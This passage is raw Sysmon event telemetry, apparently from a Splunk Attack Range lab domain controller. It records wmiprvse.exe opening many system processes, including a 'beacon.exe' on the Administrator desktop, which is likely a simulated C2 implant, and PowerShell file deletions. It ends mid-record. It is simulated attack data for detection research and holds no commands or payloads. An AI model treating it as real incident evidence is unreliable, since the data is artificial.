16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_g2ohkc5x.mgf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002242561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_blroqrnt.1uq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941BCA9E0661FC3D8C93C6AF80217BC5,SHA256=FBAA525596606CFFE207C0D40C1A93008BD25CE5A8ABEAD20BE9E42A36DAB1EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D5AA-00000000AD01}15664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D5AA-00000000AD01}15664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program 